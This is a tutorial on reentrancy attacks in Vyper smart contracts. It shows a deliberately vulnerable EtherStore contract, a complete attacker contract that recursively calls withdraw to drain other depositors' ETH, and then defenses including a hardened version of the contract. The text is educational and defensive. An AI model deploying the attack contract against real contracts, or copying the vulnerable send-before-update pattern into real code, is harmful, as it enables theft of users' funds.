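Reentrancy is one of the most destructive attacks against Ethereum smart contracts. A reentrancy attack occurs when a function makes an external call to another, untrusted contract. The untrusted contract then recursively calls back into the original function in an attempt to drain funds.
When a contract fails to update its state before sending funds, an attacker can call the withdraw function repeatedly to drain the contract. A well-known real-world reentrancy attack is the DAO attack, which resulted in a loss of 60 million US dollars.
A reentrancy attack involves two smart contracts: the vulnerable contract and the attacker's untrusted contract.
The withdraw function will now verify again whether it can execute:
You are probably more familiar with reentrancy attacks on Solidity smart contracts; in this article we demonstrate the reentrancy vulnerability using Vyper code.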
```vyper
# @version >=0.3.2
"""
@notice EtherStore is a contract where you can deposit ETH and withdraw that same amount of ETH later.
This contract is vulnerable to re-entrancy attack.
Here is the attack flow:
1. Deposit 1 ETH each from Account 1 (Alice) and Account 2 (Bob) into EtherStore.
2. Deploy the Attack contract.
3. Call the Attack contract's attack function sending 1 ether (using Account 3 (Eve)).
   You will get 3 Ethers back (2 Ether stolen from Alice and Bob,
   plus 1 Ether sent from this contract).

What happened?
Attack was able to call EtherStore.withdraw multiple times before
EtherStore.withdraw finished executing.
"""

# @notice Mapping from address to ETH balance held in the contract
balances: public(HashMap[address, uint256])

# @notice Function to deposit ETH into the contract
@external
@payable
def deposit():
    self.balances[msg.sender] += msg.value

# @notice Function to withdraw the ETH deposited into the contract
@external
def withdraw():
    bal: uint256 = self.balances[msg.sender]
    assert bal > 0, "This account does not have a balance"
    # @dev Send the user's balance to them using raw call
    raw_call(msg.sender, b'', value=bal)
    # @dev Set user's balance to 0
    self.balances[msg.sender] = 0

# @notice Helper function to get the balance of the contract
@external
@view
def getBalance() -> uint256:
    return self.balance
```
```vyper
# @version >=0.3.2
"""
@notice Here is the order of function calls during the attack
- Attack.attack
- EtherStore.deposit
- EtherStore.withdraw
- Attack.default (receives 1 Ether)
- EtherStore.withdraw
- Attack.default (receives 1 Ether)
- EtherStore.withdraw
- Attack.default (receives 1 Ether)
"""

# @notice Interface with the EtherStore contract
interface IEtherstore:
    def deposit(): payable
    def withdraw(): nonpayable
    def getBalance() -> uint256: view

# @notice The address where the EtherStore contract is deployed
victim: public(address)

# @notice Set the victim address
@external
def setVictim(_victim: address):
    self.victim = _victim

# @notice Default is called when EtherStore sends ETH to this contract.
@external
@payable
def __default__():
    # @dev Checks if the balance of the EtherStore contract is at least 1 ETH (in wei)
    if IEtherstore(self.victim).getBalance() >= as_wei_value(1, "ether"):
        IEtherstore(self.victim).withdraw()

@external
@payable
def attack():
    assert msg.value >= as_wei_value(1, "ether"), "Must send 1 ETH"
    IEtherstore(self.victim).deposit(value=as_wei_value(1, "ether"))
    IEtherstore(self.victim).withdraw()

# @notice Helper function to get the balance of the contract
@external
@view
def getBalance() -> uint256:
    return self.balance
```
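Use send() instead of call(): the reentrancy attack will fail because send() does not forward enough gas for the next step.
Use the @nonreentrant(<key>) decorator: applying this decorator to your withdraw function will prevent reentrancy attacks.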
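A hardened EtherStore, as an added example rather than code from the original article: it clears the balance before the external call (the state update whose absence makes the contract above exploitable) and also applies @nonreentrant. The `^0.3.2` pragma and the lock key "lock" are assumptions; the keyed decorator form is the Vyper 0.3.x syntax.

```vyper
# @version ^0.3.2
# Added example: hardened EtherStore (not the article's own code).
# Assumptions: the ^0.3.2 pragma and the lock key "lock".

# @notice Mapping from address to ETH balance held in the contract
balances: public(HashMap[address, uint256])

# @notice Function to deposit ETH into the contract
# @dev Shares the lock key with withdraw, so neither function can be
#      entered while the other is still executing.
@external
@payable
@nonreentrant("lock")
def deposit():
    self.balances[msg.sender] += msg.value

# @notice Function to withdraw the ETH deposited into the contract
@external
@nonreentrant("lock")
def withdraw():
    # Check: the caller must have a balance
    bal: uint256 = self.balances[msg.sender]
    assert bal > 0, "This account does not have a balance"

    # Effect: clear the balance BEFORE any external call, so a
    # re-entrant withdraw would see 0 and fail the assert above
    self.balances[msg.sender] = 0

    # Interaction: raw_call reverts by default if the transfer fails,
    # which also rolls back the balance update above
    raw_call(msg.sender, b"", value=bal)

# @notice Helper function to get the balance of the contract
@external
@view
def getBalance() -> uint256:
    return self.balance
```

With this ordering, a nested EtherStore.withdraw call made from the recipient's `__default__` hits the lock (and, even without the lock, finds a zero balance), so the nested call reverts and the whole transaction reverts with it.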
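In this article we looked at the mechanics of reentrancy attacks in Vyper smart contracts, an example, and the defenses. Reentrancy is a serious security threat: when a contract fails to update its state before sending funds, an attacker can drain it by recursively calling the withdraw function. Reentrancy is not only common in Solidity; Vyper smart contracts need to guard against it as well!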